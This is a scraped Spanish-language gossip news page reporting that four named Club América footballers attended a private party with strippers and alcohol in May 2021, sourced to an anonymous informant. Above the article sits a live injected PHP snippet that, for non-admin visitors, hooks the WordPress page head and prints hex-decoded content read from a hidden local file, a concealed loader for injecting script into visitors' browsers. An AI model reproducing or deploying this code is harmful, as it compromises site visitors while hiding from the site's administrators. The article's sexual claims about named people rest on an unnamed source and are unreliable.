if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Escándalo en el América: exhiben a cuatro figuras en una fiesta con strippers, alcohol y desenfreno, días antes de la eliminación – La Opinión Universitaria La Opinión Universitaria
Menu

Escándalo en el América: exhiben a cuatro figuras en una fiesta con strippers, alcohol y desenfreno, días antes de la eliminación

Se viene un sismo en las entrañas del Club América ¿El motivo? Una simple fiesta para celebrar el pase a la Semifinal de la Liga de Campeones de la Concacaf.

Faltando una semana para los cuartos de final del torneo Guard1anes 2021, y un día después de vencer al Portland Timbers (3-1) en la cancha del Estadio Azteca, cuatro jugadores de las Águilas se reunieron en una casa rentada al sur de la Ciudad de México para celebrar en privado… Hasta ahí todo marchaba bien, pero unas fotos filtradas esta semana a la prensa de espectáculos terminaron destapando un nuevo escándalo sexual en el fútbol mexicano.

Según informó la revista TV Notas, una persona que es “amigo” de varios jugadores del América le habría enviado las fotografías y confirmado que el pasado 6 de mayo los futbolistas Roger Martínez, Nicolás Benedetti, Richard Sánchez y Leonardo Suárez, asistieron a una fiesta privada en la exclusiva colonia Lomas del Pedregal en la que, según sus propias palabras, “hubo mucho alcohol y desenfreno”.

A la fiesta llegaron unas mujeres muy guapas que iban con toda la intención de pasársela muy bien […] pero quienes se la pasaron de lo mejor con ellas fueron Roger Martínez y Nico Benedetti, aunque al final todos le entraron a la diversión”, reveló la fuente anónima a la revista.

El diario deportivo Récord confirmó que ese día por la tarde el club les había organizado un asado a sus jugadores en las instalaciones de Coapa. En las fotografías de ambos eventos se puede confirmar que los jugadores llevaban la misma vestimenta.

El testigo consultado dio varios detalles sobre la polémica fiesta a la que asistieron los jugadores por su cuenta y sin conocimiento del club; incluso se dio el lujo de anticipar el escándalo que se les iba “armar” a los futbolistas: “Créeme, si en el club se hubieran enterado, ya les habrían puesto un castigo interno, pero cuando se sepa, se les va a armar en su casa y en el club, donde tienen prohibidos este tipo de ‘festejos’”.

“No sé quién trajo a las chavas, pero Nico le pidió a una de ellas que se pusiera arriba de él y comenzaron a moverse muy atrevidamente […] Roger fue más allá y se bajó el pantalón… ¡y ella rápido agarró confianza con él! Como todos estaban tomados, la fiesta se salió de control”, detalló la fuente consultada.

 

Tweets recientes